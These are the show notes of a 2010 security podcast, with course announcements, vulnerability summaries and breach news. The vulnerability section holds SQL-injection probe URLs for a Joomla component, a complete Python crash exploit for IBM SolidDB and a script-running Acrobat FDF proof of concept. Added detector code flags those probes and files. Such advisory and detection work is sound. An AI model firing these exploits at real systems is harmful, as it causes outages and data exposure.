InfoSec Podcast for January 26, 2010. This podcast is our contribution back to the community: we discuss the vulnerabilities of interest and information-security-related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.
FORENSICS 606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10
Register online at the SANS website or call (301) 654-SANS (7267).
SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)
Vulnerabilities of Interest:
- The JBDiary component for Joomla! is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:
http://www.sample.com/?newyear=2011'+and+substring(@@version,1,1)=4%23&newmonth=01
http://www.sample.com/?newyear=2011'+and+substring(@@version,1,1)=5%23&newmonth=01
http://www.sample.com/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=4%23
http://www.sample.com/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=5%23
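As an added example (not from the podcast or the advisory), the following Python scans web-server access-log lines for the boolean-blind probe shape seen in the example URLs above: a quote closing the string literal, a boolean connective, a probe on @@version, and a %23 (MySQL '#' comment) swallowing the rest of the query. The log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not taken from the page): two carry the JBDiary
# boolean-blind probes quoted above, the third is an ordinary request.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Jan/2010:10:01:02 +0000] "GET /?newyear=2011'+and+substring(@@version,1,1)=4%23&newmonth=01 HTTP/1.1" 200 5120
203.0.113.5 - - [26/Jan/2010:10:01:03 +0000] "GET /?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=5%23 HTTP/1.1" 200 4880
198.51.100.7 - - [26/Jan/2010:10:02:10 +0000] "GET /?newyear=2010&newmonth=01 HTTP/1.1" 200 5120
"""

# Request target inside the quoted request line of a common/combined log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Probe shape from the advisory: a quote that closes the string literal, a boolean
# connective, then a probe expression such as substring(@@version,...).  The trailing
# %23 decodes to '#', the MySQL line comment that discards the rest of the query.
PROBE_RE = re.compile(
    r"""['"]\s*(?:and|or)\b.*?(?:@@version|substring\s*\(|sleep\s*\(|benchmark\s*\()""",
    re.IGNORECASE,
)

def suspicious_params(request_target):
    """Return (name, decoded_value) for each query parameter that matches the probe shape."""
    # parse_qsl percent-decodes the values and turns '+' back into spaces.
    query = urlsplit(request_target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if PROBE_RE.search(value)]

def scan_log(text):
    """Return (client_ip, parameter, decoded_value) for every flagged request in the log."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for name, value in suspicious_params(m.group(1)):
            findings.append((client_ip, name, value))
    return findings

if __name__ == "__main__":
    for client_ip, name, value in scan_log(SAMPLE_LOG):
        print(f"{client_ip}: parameter {name!r} = {value!r}")
```

Decoding before matching matters: the raw log line never contains a literal '#' or a space, so a pattern applied to the undecoded URL would miss the comment marker.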
- IBM SolidDB is subject to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. This issue affects SolidDB 6.30.0.29 and 6.30.0.33; other versions may also be affected. Exploit code is available:
#!python
import socket
import struct
# maxlen 0xA
# Build the malformed request described above: a one-byte type, a zero
# 16-bit field, two 0xFEFF length words and a short trailing payload.
a = struct.pack('<b', 2)
a += struct.pack('<H', 0)
a += struct.pack('<H', 0xFEFF)
a += struct.pack('<H', 0xFEFF)
a += b"1234"
target_ip = 'X.X.X.X'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, 2315))
s.send(a)
s.close()
- Google Chrome is subject to multiple vulnerabilities including multiple memory-corruption issues, multiple security-bypass issues, input-validation issues and denial-of-service issues. Attackers can exploit these issues to bypass certain security checks, execute arbitrary code in the context of the browser, and cause denial-of-service conditions; other attacks are also possible. Versions prior to Chrome 4.0.249.78 are vulnerable. Attackers can use standard tools to exploit some of the issues; other issues may require exploit code.
- Adobe Reader and Acrobat are subject to a remote security-bypass vulnerability. An attacker can exploit this issue to obtain the contents of sensitive PDF files or to perform cross-site scripting attacks against domains hosting PDF files. Example PDF:
%FDF-1.2
1 0 obj
<<
/FDF
<<
/F(http://www.sample.com/any.pdf)
/JavaScript
<<
/After (app.alert("Executing script inside Acrobat at "+URL);)
>>
>>
>>
endobj
trailer
<</Root 1 0 R>>
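As an added example (not from the podcast or the advisory), this Python triage check flags the two traits of the FDF shown above that matter for the bypass: an /F entry that points at a document on a remote host, and a /JavaScript dictionary. The sample inputs are constructed; the first reuses the shape of the FDF listed above.

```python
import re

# Constructed sample: the FDF shape shown above (remote /F plus JavaScript).
SUSPICIOUS_FDF = b"""%FDF-1.2
1 0 obj
<<
/FDF
<<
/F(http://www.sample.com/any.pdf)
/JavaScript
<<
/After (app.alert("Executing script inside Acrobat at "+URL);)
>>
>>
>>
endobj
trailer
<</Root 1 0 R>>
"""

# Constructed benign sample: a local form target and plain field values only.
BENIGN_FDF = b"""%FDF-1.2
1 0 obj
<< /FDF << /F(form.pdf) /Fields [ << /T (name) /V (Alice) >> ] >> >>
endobj
trailer
<</Root 1 0 R>>
"""

# Literal-string form of /F only; escaped parentheses and hex strings are not handled.
F_RE = re.compile(rb"/F\s*\(([^)]*)\)")
JS_RE = re.compile(rb"/JavaScript\b|/JS\b")
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "file://")

def assess_fdf(data):
    """Return the reasons an FDF file should be held for review; empty if none apply."""
    if not data.startswith(b"%FDF-"):
        return ["not an FDF file"]
    reasons = []
    m = F_RE.search(data)
    target = m.group(1).decode("latin-1").strip() if m else ""
    if target.lower().startswith(REMOTE_SCHEMES):
        reasons.append("/F points at a remote document: " + target)
    if JS_RE.search(data):
        reasons.append("/JavaScript dictionary present")
    return reasons

if __name__ == "__main__":
    print(assess_fdf(SUSPICIOUS_FDF))   # two reasons
    print(assess_fdf(BENIGN_FDF))       # []
```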
News Items of Interest:
News item 1: http://www.theregister.co.uk/2010/01/25/oil_companies_attacked/
At least three US oil companies were victims of highly targeted, email-borne attacks designed to siphon valuable data from their corporate networks and send it abroad, according to a published report citing unnamed people and government documents.
The attacks against Marathon Oil, ExxonMobil, and ConocoPhillips began with emails sent to senior executives that included links to booby-trapped websites, according to the report in The Christian Science Monitor. The breaches focused on the companies’ proprietary “bid data” detailing the quantity, value, and location of petroleum discoveries worldwide. The report said at least some of the attacks appeared to originate in China, but didn’t provide proof beyond the existence of servers located in that country used to store some of the stolen data.
News item 2: http://www.dailymail.co.uk/news/article-1245622/For-sale-Personal-details-millions-Ladbrokes-gamblers.html
The confidential records of millions of British gamblers who bet with top bookmaker Ladbrokes have been offered for sale to The Mail on Sunday.
The huge data theft is now at the center of a criminal investigation after this newspaper was given the personal information of 10,000 Ladbrokes customers and offered access to its database of 4.5 million people in the UK and abroad. The records include customers’ home addresses, details of their gambling history, customer account numbers, dates of birth, phone numbers and email addresses.
News item 3: http://www.lasvegassun.com/news/2010/jan/25/umc-patient-info-leaks-likely-date-back-july/
For more than three months someone at University Medical Center illegally leaked the personal information of traffic accident victims — a breach of social security numbers, birth dates and more that only stopped when the Las Vegas Sun contacted the hospital about it, according to a statement released today by UMC.
News item 4: http://news.cnet.com/8301-27080_3-10441004-245.html
People behind the China-based online attacks of Google and other companies looked up key employees on social networks and contacted them pretending to be their friends to get the workers to click on links leading to malware, according to a published report on Monday. “The most significant discovery is that the attackers had selected employees at the companies with access to proprietary data, then learnt who their friends were,” the Financial Times reported. “The hackers compromised the social network accounts of those friends, hoping to enhance the probability that their final targets would click on the links they sent.”
News item 5: http://blog.osvdb.org/2010/01/24/microsoft-aurora-and-something-about-forest-and-trees
Why do we care that Microsoft sits on vulnerabilities for six months? Why is that such a big deal? Am I the only one who missed the articles pointing out that they actually sat on five other code execution bugs for much longer?
| CVE | Reported to MS | Disclosed | Time to Patch |
|---|---|---|---|
| CVE-2010-0244 | 2009-07-14 | 2010-01-21 | 6 months, 7 days (191 days) |
| CVE-2010-0245 | 2009-07-14 | 2010-01-21 | 6 months, 7 days (191 days) |
| CVE-2010-0246 | 2009-07-16 | 2010-01-21 | 6 months, 5 days (189 days) |
| CVE-2010-0248 | 2009-08-14 | 2010-01-21 | 5 months, 7 days (160 days) |
| CVE-2010-0247 | 2009-09-03 | 2010-01-21 | 4 months, 18 days (140 days) |
| CVE-2010-0249 | 2009-09-?? | 2010-01-14 | 4 months, 11 days (133 days), approx. |
| CVE-2010-0027 | 2009-11-15 | 2010-01-21 | 2 months, 6 days (67 days) |
| CVE-2009-4074 | 2009-11-20 | 2009-11-21 | 2 months, 1 day (62 days) |
News item 6: http://www.businesscomputingworld.co.uk/?p=3347
Some additional news out of CES is that Victorinox’s Swiss Army knife remained uncracked, and the $100,000 prize went unclaimed. Even if someone had cracked the 2010 version of the famous Swiss Army knife, they would have obtained a lot more than $100,000 from other sources. Victorinox, the manufacturer of the Swiss Army knife, which dates back to the late 1800s in its various forms, has made much of the unit’s tamper-proof self-destruct mode, but the reality is that the crypto USB drive supports elliptic-curve and AES encryption, which makes it almost impervious to crackers using currently known technology.
As Schneier observed in his research, cryptography is all about safety margins. If a hacker manages to crack 128-bit AES technology, then you can bet your bottom line that Schneier would be interested, and governments would pay a lot more than $100,000 for the secret. But this clearly isn’t going to happen for some time to come, so I think Victorinox’ cash is safe for the time being.
News item 7: http://www.wired.com/threatlevel/2010/01/jilsi-pleads-guilty
A former ringleader of a top internet carding site run secretly by the FBI has pleaded guilty in the United Kingdom. Renukanth Subramaniam, aka JiLsi, was a former Pizza Hut delivery guy who helped run one of the leading English-language criminal sites, DarkMarket. The site operated as an international cyber-bazaar for more than 2,000 hackers, carders and identity thieves until it was closed in 2008.
Members of the site traded in stolen bank card and identification data. They bought and sold specialized equipment for skimming card and PIN numbers, and for cloning data to blank cards. The activities on DarkMarket are estimated to have resulted in fraud amounting to tens of millions of dollars.
News item 8: http://news.cnet.com/8301-27080_3-10439263-245.html
The California Department of Motor Vehicles department suffered a network outage on Thursday due to an equipment glitch, a state official said. A router switch malfunctioned, said Bill Maile, spokesman for Office of Technology Services for the state of California. “It’s very rare,” he said. “Our staff quickly diagnosed the problem and re-routed network traffic to restore connectivity.” The network was down for about two hours and was restored at about 1:40 p.m. PST, according to Maile. There are 168 DMV offices throughout the state, said Jan Mendoza, spokeswoman for the DMV. “We didn’t close offices,” she said. “When people came in we handled customers manually. We did it the old-fashioned way–with pen and paper.”
News item 9: http://www.eetimes.com/news/design/showArticle.jhtml?articleID=222301321
The IEEE has launched a new Web site that consolidates information about smart electric grids from its various societies. The portal is one of many activities from an IEEE smart grid initiative coordinating the organization’s work on the transition to digital, networked power systems and services.
The smart grid is “so interdisciplinary,” said Wanda Reder, chair of the IEEE Smart Grid Task Force and former president of the IEEE Power & Energy Society. “We have the gamut covered in technical interests, but we needed a way to facilitate communications between our many entities to link information on all the conferences, papers and standards we have in this area,” she added.
The Web site lists many of the estimated 100 existing IEEE standards related to smart grids. It also includes pointers to the IEEE 2030 group started last year that aims to release a draft guide to smart grid design in early 2011.
News item 10: http://news.zdnet.co.uk/security/0,1000000189,40005862,00.htm?s_cid=248
Many organizations are focused on stopping random hackers and blocking pornography when they should be concerned with bigger threats from professional cybercriminals, according to a new cybersecurity report.
In a survey conducted in 2009 of 523 IT and security managers, top-level executives and law-enforcement personnel, hackers were rated the biggest threat, followed by insiders and foreign entities — probably because hackers are the “noisiest and easiest to detect”, the 2010 CyberSecurity Watch Survey concluded.